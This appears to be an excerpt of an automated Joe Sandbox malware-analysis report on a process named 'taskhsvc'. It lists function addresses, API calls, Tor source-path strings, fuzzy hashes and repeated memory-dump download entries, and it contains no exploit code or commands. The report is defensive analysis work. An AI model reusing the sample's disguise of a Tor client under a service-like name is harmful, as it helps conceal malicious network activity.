Opcode Fuzzy Hash: f9aed3eed92dc400527ff35f4da4f41bf082ab882a4ab4355a97a87295147420
Instruction Fuzzy Hash: 6E519FB4E05209DFDB00DFA8C5957ADBBF0BF08314F1A9869EA44AB350D3799984CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00D963F3 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E9E121: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00D96409), ref: 00E9E1A2

time.MSVCRT ref: 00D9648C
event_base_loop.LIBEVENT-2-0-5 ref: 00D964B2
__stack_chk_fail.LIBSSP-0 ref: 00D965E4

Strings

c, xrefs: 00D9657B
4', xrefs: 00D9653C
../src/or/main.c, xrefs: 00D96557

Memory Dump Source

Source File: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$event_base_looptime
String ID: ../src/or/main.c$4'$c
API String ID: 1104678557-3677365949
Opcode ID: bcb4be23ebf7c575e1c30c4a4fc8665145d3ef9848d6aa4869e64caaeac78b06
Instruction ID: 054739fe8b183ca3a9619e3061e2c9dacfff4a315dfe22043a0636eabcee7d71
Opcode Fuzzy Hash: bcb4be23ebf7c575e1c30c4a4fc8665145d3ef9848d6aa4869e64caaeac78b06
Instruction Fuzzy Hash: C45125B0A08346CFDB00EFA9C48976EBBF0BB04304F05891DE4949B396D779D984DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00FC6A10 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fwrite.MSVCRT ref: 00FC6A3B
vfprintf.MSVCRT ref: 00FC6A57
abort.MSVCRT ref: 00FC6A5C
VirtualQuery.KERNEL32 ref: 00FC6B00
VirtualProtect.KERNEL32 ref: 00FC6B42

Strings

@, xrefs: 00FC6B2B

Memory Dump Source

Source File: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: Virtual$ProtectQueryabortfwritevfprintf
String ID: @
API String ID: 1503958624-2766056989
Opcode ID: d0d3953bfafdf82fc871d981cf2188db31066f27ecb80b09750f40837c78d5e6
Instruction ID: 065d824154c0fa9cbbe36250b2d3ab8049158fae39ebbf73b794556d9c21decf
Opcode Fuzzy Hash: d0d3953bfafdf82fc871d981cf2188db31066f27ecb80b09750f40837c78d5e6
Instruction Fuzzy Hash: A4411CB19093028FC710EF29D685B1ABBE0FB84350F49891DE8D9E7355E739E844EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00D9625A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E7C627: event_new.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D9625F), ref: 00E7C691
Part of subcall function 00E7C627: event_add.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D9625F), ref: 00E7C6AB
Part of subcall function 00E7C627: __stack_chk_fail.LIBSSP-0 ref: 00E7C722

Part of subcall function 00DEF792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00DD6074), ref: 00DEF7B2

Part of subcall function 00E2B282: __stack_chk_fail.LIBSSP-0 ref: 00E2B2C4

abort.MSVCRT ref: 00D96309
abort.MSVCRT ref: 00D963D7
__stack_chk_fail.LIBSSP-0 ref: 00D963EC

Strings

$, xrefs: 00D963C7
<_", xrefs: 00D9636F
`", xrefs: 00D962A1
../src/or/main.c, xrefs: 00D962DD, 00D963AB

Memory Dump Source

Source File: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$abort$event_addevent_new
String ID: $$../src/or/main.c$`"$<_"
API String ID: 436055055-502782751
Opcode ID: 4474f0bbd3ab37ffb914c89c6722f31396245fd1aedecf282a44f078cb14c0fa
Instruction ID: 0f60032d69f22b528a114f4764cbb528f0bb05455123235121c6dba4e750ccc5
Opcode Fuzzy Hash: 4474f0bbd3ab37ffb914c89c6722f31396245fd1aedecf282a44f078cb14c0fa
Instruction Fuzzy Hash: DE414A707043028FDB44EFB5C95536EBBE4AB84304F08882DF088DB386EB78D4449B62

Uniqueness

Uniqueness Score: -1.00%

Function 00DF9FAA Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.MSVCRT ref: 00DFA03C
free.MSVCRT ref: 00DFA14F

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

free.MSVCRT ref: 00DFA1E7
__stack_chk_fail.LIBSSP-0 ref: 00DFA20C

Strings

\:, xrefs: 00DFA1B8
<NULL>, xrefs: 00DFA079

Memory Dump Source

Source File: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: free$__stack_chk_fail
String ID: <NULL>$\:
API String ID: 3445780955-2044585148
Opcode ID: e4b1b9a08f4e32af3bec01ec69f3a20283c28c40f1790a9be965c50645f9e261
Instruction ID: fb8647dcb4dd7e3f61997adc178fadb1bc2b6ce7bf09eb4b483a8d14dfddc52d
Opcode Fuzzy Hash: e4b1b9a08f4e32af3bec01ec69f3a20283c28c40f1790a9be965c50645f9e261
Instruction Fuzzy Hash: D671B2B490430ADFDB04DFA9C4857AEBBF0BF05304F158819E598AB380D7799985DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00E5563C Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 152stringCOMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0 ref: 00E558D8

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

abort.MSVCRT ref: 00E556B8

Part of subcall function 00EF158B: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE3E8F), ref: 00EF15E4
Part of subcall function 00EF158B: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE3E8F), ref: 00EF1623
Part of subcall function 00EF158B: memcpy.MSVCRT ref: 00EF164A
Part of subcall function 00EF158B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE3E8F), ref: 00EF165D

Part of subcall function 00EE9D53: __stack_chk_fail.LIBSSP-0 ref: 00EE9DB3

Part of subcall function 00F01294: __stack_chk_fail.LIBSSP-0 ref: 00F017CD

strlen.MSVCRT ref: 00E557BC

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

Strings

B, xrefs: 00E557CB
B, xrefs: 00E55771
